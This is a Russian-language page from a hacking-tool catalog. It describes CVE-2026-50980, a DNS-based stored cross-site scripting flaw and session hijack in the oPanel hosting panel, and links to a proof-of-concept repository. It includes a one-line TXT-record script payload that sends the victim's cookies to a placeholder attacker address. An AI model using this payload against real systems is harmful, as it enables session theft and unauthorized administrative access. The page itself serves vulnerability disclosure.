Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/bugresearch/cve-2026-50980
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьАнализ DNS
GitHubbugresearch/cve-2026-50980

CVE-2026-50980

oPanel DNS-основанный межсайтовый скриптинг (XSS) и перехват сессий

Репозиторий
1 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-50980: Межсайтовый скриптинг (XSS) на основе DNS и угон сессии в oPanel

Обзор

  • Идентификатор CVE: CVE-2026-50980
  • Продукт: oPanel
  • Затронутые версии: < v1.20.25
  • Тип уязвимости: Хранимый межсайтовый скриптинг (XSS) через DNS / угон сессии
  • Серьёзность: Высокая (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N)

Описание

В oPanel (версии до v1.20.25) существует уязвимость межсайтового скриптинга (XSS), вызванная некорректной обработкой и очисткой DNS-ответов. Когда панель выполняет DNS-запрос (например, получение информации о домене, проверка распространения DNS или запрос TXT-записей) к управляемому злоумышленником серверу имён, возвращаемые DNS-записи отображаются в веб-интерфейсе без надлежащего HTML-кодирования.

Злоумышленник может воспользоваться этим, настроив подставной DNS-сервер, который отвечает на запросы TXT-записей вредоносной JavaScript-нагрузкой. Когда аутентифицированный пользователь oPanel (например, администратор) просматривает страницу, на которой отображается DNS-ответ, нагрузка выполняется в контексте его сессии браузера.

Воздействие

Успешная эксплуатация позволяет злоумышленнику выполнить произвольный JavaScript в браузере жертвы. Как показано в доказательстве концепции, это может быть использовано для кражи чувствительных аутентификационных cookie (document.cookie), что приводит к полному угону сессии и несанкционированному административному доступу к среде oPanel.

Доказательство концепции (PoC)

Для эксплуатации требуется, чтобы злоумышленник развернул вредоносный DNS-сервер и HTTP-прослушиватель для сбора украденных данных.

1. Настройка инфраструктуры злоумышленника

Злоумышленник запускает подставной DNS-сервер на UDP-порту 53, настроенный на ответ на любой запрос TXT нагрузкой XSS.

Вредоносная нагрузка TXT-записи:

root@kitploit:~
<script>new Image().src='http://<ATTACKER_IP>:<HTTP_PORT>/log?cookie='+document.cookie;</script>
Скачать инструмент